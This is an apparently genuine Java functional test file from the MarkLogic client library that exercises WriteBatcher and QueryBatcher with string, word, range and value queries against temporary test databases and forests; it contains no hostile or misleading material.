QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(qbyexDef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { querybatchResults.append(str) .append('|'); } querybatchResults.append(batch.getForestResultsSoFar()) .append('|') .append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); querybatchFailResults.append("Test has Exceptions"); querybatchFailResults.append(throwable.getMessage()); } ); // Trying to use a WriteBatcher on the same docId. WriteBatcher batcherTwo = dmManager.newWriteBatcher(); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; StringHandle handle = new StringHandle(); handle.set(jsonDoc); // Update contents to same doc uri. batcherTwo.withBatchSize(1); batcherTwo.add("/batcher-contraints11.json", handle); batcherTwo.flushAndWait(); JobTicket jobTicketWriteTwo = dmManager.startJob(batcherTwo); JobTicket jobTicket = dmManager.startJob(queryBatcher1); queryBatcher1.awaitTermination(1, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if( !querybatchFailResults.toString().isEmpty() && querybatchFailResults.toString().contains("Exceptions")) { System.out.println("Query Batch Failed - Buffer Contents are:" + querybatchFailResults.toString()); fail("Test failed due to exceptions"); } if( querybatchResults != null && !querybatchResults.toString().isEmpty()) { // Verify the batch results now. String[] res = querybatchResults.toString().split("\\|"); assertTrue("URI returned not correct", res[0].contains("/batcher-contraints1.json")); assertEquals("Bytes Moved","0", res[1]); assertEquals("Batch Number","0", res[3]); } } }*/ @Test public void testQueryBatcherJobDetails() throws Exception { String testMultipleDB = "QHBJobDetaitDB"; String[] testMultipleForest = {"QHBJobDetaitDB-1"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testQueryBatcherJobDetails"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionName = "absRangeConstraintWithVariousGrammarAndWordQueryOpt.xml"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); setQueryOption(clientTmp, queryOptionName); QueryManager queryMgr = clientTmp.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("0012"); //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManagerTmp.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. 
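      // The string criteria "0012" is expected to match exactly one of the five documents written
      // below (batcher-contraints2.xml), which keeps the batch, forest, and job bookkeeping assertions simple.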
String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuilder batchDetails = new StringBuilder(); StringBuilder forestDetails = new StringBuilder(); StringBuilder jobDetails = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); // Batch details batchDetails.append(batch.getJobBatchNumber()) .append('|') .append(batch.getJobResultsSoFar()) .append('|') .append(batch.getForestBatchNumber()); // Get the Forest details Forest forest = batch.getForest(); forestDetails.append(forest.getDatabaseName()) .append('|') .append(forest.getHost()) .append('|') .append(forest.getForestName()); // Get the Job details /*jobDetails.append(batch.getJobTicket().getJobId()) .append('|') .append(batch.getJobTicket().getJobType().name());*/ } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); String jobId = jobTicket.getJobId(); String jobName = jobTicket.getJobType().name(); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints2.xml")); // verify the Job and batch get method values. String[] batchDetailsArray = batchDetails.toString().split("\\|"); assertTrue("Job Batch Number not correct", Long.parseLong(batchDetailsArray[0]) > 0); assertTrue("Job Results So Far Number not correct", Long.parseLong(batchDetailsArray[1]) > 0); assertTrue("Forest Batch Number not correct", Long.parseLong(batchDetailsArray[2]) > 0); // Git Isue 124. For bytesMoved. assertTrue("Job Bytes Moved not correct", Long.parseLong(batchDetailsArray[3]) == 0); // verify the forest get method values. 
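      // forestDetails was built above as databaseName|host|forestName per URI, so index 0 holds
      // the database name and index 2 the forest name.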
String[] forestDetailsArray = forestDetails.toString().split("\\|"); assertTrue("Database name returned from batch is not correct", forestDetailsArray[0].equalsIgnoreCase(dbName)); assertTrue("Forest name returned from batch is not correct", forestDetailsArray[2].equalsIgnoreCase(testMultipleForest[0]) || forestDetailsArray[2].equalsIgnoreCase(testMultipleForest[1])); // verify the job ticket get method values. This needs to be implemented. /*String[] jobTicketArray = jobDetails.toString().split("\\|"); assertTrue("Job Id returned from batch is not correct", jobTicketArray[0].equalsIgnoreCase(jobId)); assertTrue("Job Type name returned from batch is not correct", forestDetailsArray[2].equalsIgnoreCase(jobName));*/ } } catch (Exception e) { System.out.println("Exceptions thrown from Test testAndWordQueryWithMultipleForests"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); Thread.sleep(10000); clientTmp.release(); } } /* * These are test methods that verify that different query types work. * Testing - * Word query * range query * value query */ @Test public void testDifferentQueryTypes() throws Exception { String testMultipleDB = "QBtestDifferentQueryTypesDB"; String[] testMultipleForest = {"QBtestDifferentQueryTypesDB-1"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testDifferentQueryTypes"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); // Setup constraints on DB and wait for indexes to setup. setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; ServerConfigurationManager srvMgr = client.newServerConfigManager(); srvMgr.readConfiguration(); srvMgr.setQueryOptionValidation(true); srvMgr.writeConfiguration(); clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); QueryManager queryMgr = clientTmp.newQueryManager(); // create query def StructuredQueryBuilder qb = queryMgr.newStructuredQueryBuilder(); StructuredQueryDefinition queryWorddef = qb.word(qb.element("id"), "0026"); //Use WriteBatcher to write the some files. WriteBatcher batcher = dmManagerTmp.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. 
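      // Three QueryBatcher runs exercise different query types here: the word query on element
      // "id" defined above, plus a range query on "popularity" and a value query on the
      // price/@amt attribute further below.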
String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Flush batcher.flushAndWait(); //batcher.awaitCompletion(); StringBuilder batchWordResults = new StringBuilder(); StringBuilder batchWordFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(queryWorddef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchWordResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure in testDifferentQueryTypes"); throwable.printStackTrace(); batchWordFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); while(!queryBatcher1.isStopped()) { // do nothing. } if (queryBatcher1.isStopped()) { if (!batchWordFailResults.toString().isEmpty() && batchWordFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions in testDifferentQueryTypes - Word Query"); } // Verify the batch results now. String[] res = batchWordResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints5.xml")); } // Run a range query. StructuredQueryDefinition queryRangedef = qb.range(qb.element("popularity"), "xs:integer", Operator.GE, 4); QueryBatcher queryBatcher2 = dmManagerTmp.newQueryBatcher(queryRangedef); //StringBuilder batchRangeResults = new StringBuilder(); List<String> batchRangeResults = new ArrayList<String>(); StringBuilder batchRangeFailResults = new StringBuilder(); queryBatcher2.onUrisReady(batch-> { for (String str : batch.getItems()) { batchRangeResults.add(str); //batchRangeResults.append(str) //.append('|'); } }); queryBatcher2.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure in testDifferentQueryTypes"); throwable.printStackTrace(); batchRangeFailResults.append("Test has Exceptions"); } ); jobTicket = dmManagerTmp.startJob(queryBatcher2); bJobFinished = queryBatcher2.awaitCompletion(3, TimeUnit.MINUTES); while(!queryBatcher2.isStopped()) { // do nothing. 
} if (queryBatcher2.isStopped()) { if (!batchRangeFailResults.toString().isEmpty() && batchRangeFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions in testDifferentQueryTypes - Range Query"); } // Verify the batch results now. assertTrue("No of documents returned in range query not correct", batchRangeResults.size() == 4); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints1.xml")); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints2.xml")); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints4.xml")); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints5.xml")); } // Run a ValueQueryOnAttribute query. StructuredQueryDefinition valueQueryDef = qb.value(qb.elementAttribute(qb.element(new QName("http://cloudbank.com", "price")), qb.attribute("amt")), "0.1"); QueryBatcher queryBatcher3 = dmManagerTmp.newQueryBatcher(valueQueryDef); List<String> batchValueResults = new ArrayList<String>(); StringBuilder batchvalueFailResults = new StringBuilder(); queryBatcher3.onUrisReady(batch-> { for (String str : batch.getItems()) { batchValueResults.add(str); } }); queryBatcher3.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure in testDifferentQueryTypes"); throwable.printStackTrace(); batchvalueFailResults.append("Test has Exceptions"); } ); jobTicket = dmManagerTmp.startJob(queryBatcher3); bJobFinished = queryBatcher3.awaitCompletion(3, TimeUnit.MINUTES); while(!queryBatcher3.isStopped()) { // do nothing. } if (queryBatcher3.isStopped()) { if (!batchvalueFailResults.toString().isEmpty() && batchvalueFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions in testDifferentQueryTypes - Value Query"); } // Verify the batch results now. assertTrue("No of documents returned in value query not correct", batchValueResults.size() == 1); assertTrue("URI returned not correct", batchValueResults.contains("/abs-range-constraint/batcher-contraints1.xml")); } } catch (Exception e) { System.out.println("Exceptions thrown from Test testDifferentQueryTypes"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); clientTmp.release(); Thread.sleep(10000); } } }
test-complete/src/test/java/com/marklogic/client/datamovement/functionaltests/StringQueryHostBatcherTest.java
/* * Copyright 2014-2017 MarkLogic Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.marklogic.client.datamovement.functionaltests; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertNotEquals; import static org.junit.Assert.assertTrue; import static org.junit.Assert.fail; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.util.ArrayList; import java.util.Calendar; import java.util.List; import java.util.concurrent.TimeUnit; import javax.xml.namespace.QName; import javax.xml.parsers.ParserConfigurationException; import javax.xml.transform.TransformerException; import javax.xml.xpath.XPathExpressionException; import org.junit.After; import org.junit.AfterClass; import org.junit.Before; import org.junit.BeforeClass; import org.junit.Ignore; import org.junit.Test; import org.xml.sax.SAXException; import com.fasterxml.jackson.databind.JsonNode; import com.marklogic.client.DatabaseClient; import com.marklogic.client.DatabaseClientFactory; import com.marklogic.client.DatabaseClientFactory.Authentication; import com.marklogic.client.admin.ExtensionMetadata; import com.marklogic.client.admin.ServerConfigurationManager; import com.marklogic.client.admin.TransformExtensionsManager; import com.marklogic.client.datamovement.DataMovementManager; import com.marklogic.client.datamovement.Forest; import com.marklogic.client.datamovement.JobTicket; import com.marklogic.client.datamovement.QueryBatcher; import com.marklogic.client.datamovement.WriteBatcher; import com.marklogic.client.datamovement.functionaltests.util.DmsdkJavaClientREST; import com.marklogic.client.document.JSONDocumentManager; import com.marklogic.client.document.ServerTransform; import com.marklogic.client.io.DOMHandle; import com.marklogic.client.io.FileHandle; import com.marklogic.client.io.Format; import com.marklogic.client.io.InputStreamHandle; import com.marklogic.client.io.JacksonHandle; import com.marklogic.client.io.StringHandle; import com.marklogic.client.query.QueryManager; import com.marklogic.client.query.RawCombinedQueryDefinition; import com.marklogic.client.query.StringQueryDefinition; import com.marklogic.client.query.StructuredQueryBuilder; import com.marklogic.client.query.StructuredQueryBuilder.Operator; import com.marklogic.client.query.StructuredQueryDefinition; /** * @author ageorge * Purpose : Test String Queries * - On multiple documents using Java Client DocumentManager Write method and WriteBatcher. * - On meta-data. * - On non-existent document. Verify error message. * - With invalid string query. Verify error message. 
* */ public class StringQueryHostBatcherTest extends DmsdkJavaClientREST { private static String dbName = "StringQueryHostBatcherDB"; private static String [] fNames = {"StringQueryHostBatcherDB-1", "StringQueryHostBatcherDB-2", "StringQueryHostBatcherDB-3"}; private static DataMovementManager dmManager = null; private static DataMovementManager moveMgr = null; private static String restServerHost = null; private static String restServerName = null; private static int restServerPort = 0; private static DatabaseClient clientQHB = null; private static DatabaseClient client = null; private static String dataConfigDirPath = null; /** * @throws java.lang.Exception */ @BeforeClass public static void setUpBeforeClass() throws Exception { loadGradleProperties(); restServerPort = getRestAppServerPort(); restServerHost = getRestAppServerHostName(); restServerName = getRestAppServerName(); // Points to top level of all QA data folder dataConfigDirPath = getDataConfigDirPath(); setupJavaRESTServer(dbName, fNames[0], restServerName, restServerPort); setupAppServicesConstraint(dbName); createUserRolesWithPrevilages("test-eval","xdbc:eval", "xdbc:eval-in","xdmp:eval-in","any-uri","xdbc:invoke"); createRESTUser("eval-user", "x", "test-eval","rest-admin","rest-writer","rest-reader","rest-extension-user","manage-user"); // For use with Java/REST Client API client = DatabaseClientFactory.newClient(restServerHost, restServerPort, "admin", "admin", Authentication.DIGEST); dmManager = client.newDataMovementManager(); // For use with QueryHostBatcher clientQHB = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); moveMgr = clientQHB.newDataMovementManager(); } /** * @throws java.lang.Exception */ @AfterClass public static void tearDownAfterClass() throws Exception { System.out.println("In tearDownAfterClass"); // Release clients client.release(); clientQHB.release(); associateRESTServerWithDB(restServerName, "Documents" ); deleteRESTUser("eval-user"); detachForest(dbName, fNames[0]); deleteDB(dbName); deleteForest(fNames[0]); } /** * @throws java.lang.Exception */ @Before public void setUp() throws Exception { System.out.println("In setup"); } /** * @throws java.lang.Exception */ @After public void tearDown() throws Exception { System.out.println("In tearDown"); clearDB(restServerPort); } /* * To test String query with Document Manager (Java Client API write method) and WriteBatcher. * @throws IOException * @throws ParserConfigurationException * @throws SAXException * @throws XpathException */ @Test public void testAndWordQuery() throws IOException, ParserConfigurationException, SAXException, InterruptedException { System.out.println("Running testAndWordQuery"); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionName = "absRangeConstraintWithVariousGrammarAndWordQueryOpt.xml"; try { // write docs using Java Client API for (String filename : filenames) { writeDocumentUsingInputStreamHandle(client, filename, "/abs-range-constraint/", "XML"); } setQueryOption(client, queryOptionName); QueryManager queryMgr = client.newQueryManager(); // create query def StringQueryDefinition querydef = queryMgr.newStringDefinition(queryOptionName); querydef.setCriteria("(pop:high OR pop:medium) AND price:medium AND intitle:served"); // create handle to search using Java Client API. 
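// The JacksonHandle below captures the raw JSON search response; each entry in its "results" array carries the match index, uri and content snippet that the assertions afterwards inspect.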
JacksonHandle jh = new JacksonHandle(); JsonNode jsonResults = queryMgr.search(querydef, jh).get(); // Verify the results. JsonNode searchResult = jsonResults.get("results").get(0); assertEquals(1, searchResult.get("index").asInt()); assertEquals("/abs-range-constraint/constraint4.xml", searchResult.get("uri").asText()); String contents = searchResult.get("content").asText(); assertTrue("Expected String not available", contents.contains("Vannevar served")); assertTrue("Expected amt not available", contents.contains("12.34")); // Clear the database. clearDB(8000); //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManager.newWriteBatcher(); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Verify if the batch flushes when batch size is reached. // Flush batcher.flushAndWait(); // Hold for asserting the callbacks batch contents, since callback are on different threads than the main JUnit thread. // JUnit can not assert on different threads; other than the main one. StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch -> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } batchResults.append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); }); JobTicket jobTicket = dmManager.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints4.xml")); //Verify Fores Name. assertTrue("Forest name not correct", res[2].contains(fNames[0])); } } catch(Exception e) { System.out.print(e.getMessage()); } finally { } } /* * To test String query with multiple forests. 
* @throws Exception * */ @Test public void testAndWordQueryWithMultipleForests() throws Exception { String testMultipleDB = "QBMultipleForestDB"; String[] testMultipleForest = {"QBMultipleForestDB-1", "QBMultipleForestDB-2", "QBMultipleForestDB-3"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testAndWordQueryWithMultipleForests"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); createForest(testMultipleForest[1], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionName = "absRangeConstraintWithVariousGrammarAndWordQueryOpt.xml"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); setQueryOption(clientTmp, queryOptionName); QueryManager queryMgr = clientTmp.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("0012"); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManagerTmp.newWriteBatcher(); batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Verify if the batch flushes when batch size is reached. // Flush batcher.flushAndWait(); // Hold for asserting the callbacks batch contents, since callback are on different threads than the main JUnit thread. // JUnit can not assert on different threads; other than the main one. StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. 
QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints2.xml")); } } catch (Exception e) { System.out.println("Exceptions thrown from Test testAndWordQueryWithMultipleForests"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); Thread.sleep(10000); clientTmp.release(); } } /* * To test query by example with WriteBatcher and QueryBatcher. * @throws IOException * @throws InterruptedException */ /*public void testQueryByExample() throws IOException, InterruptedException { System.out.println("Running testQueryByExample"); String[] filenames = {"constraint1.json", "constraint2.json", "constraint3.json", "constraint4.json", "constraint5.json"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); StringBuffer writebatchResults = new StringBuffer(); batcher.add("/batcher-contraints1.json", contentHandle1); batcher.add("/batcher-contraints2.json", contentHandle2); batcher.add("/batcher-contraints3.json", contentHandle3); batcher.add("/batcher-contraints4.json", contentHandle4); batcher.add("/batcher-contraints5.json", contentHandle5); // Flush batcher.flushAndWait(); StringBuilder querybatchResults = new StringBuilder(); StringBuilder querybatchFailResults = new StringBuilder(); // get the query File file = new File(dataConfigDirPath + "qbe1.json"); FileHandle fileHandle = new FileHandle(file); QueryManager queryMgr = client.newQueryManager(); RawQueryByExampleDefinition qbyexDef = queryMgr.newRawQueryByExampleDefinition(fileHandle.withFormat(Format.JSON)); // Run a QueryBatcher. 
QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(qbyexDef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { querybatchResults.append(str) .append('|'); } querybatchResults.append(batch.getJobResultsSoFar()) .append('|') .append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); querybatchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitTermination(30, TimeUnit.SECONDS); if (queryBatcher1.isStopped()) { if (!querybatchFailResults.toString().isEmpty() && querybatchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = querybatchResults.toString().split("\\|"); assertTrue("URI returned not correct", res[0].contains("/batcher-contraints1.json")); assertEquals("Bytes Moved","0", res[1]); assertEquals("Batch Number","0", res[3]); } }*/ /* * To test query by example with WriteBatcher and QueryBatcher * with Query Failure (incorrect query syntax). * * @throws IOException * @throws InterruptedException */ // EA 3 Modify the test for batch failure results. Remove the fail. @Ignore public void testQueryBatcherQueryFailures() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherQueryFailures"); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/fail-contraints1.xml", contentHandle1); batcher.add("/fail-contraints2.xml", contentHandle2); batcher.add("/fail-contraints3.xml", contentHandle3); batcher.add("/fail-contraints4.xml", contentHandle4); batcher.add("/fail-contraints5.xml", contentHandle5); // Flush 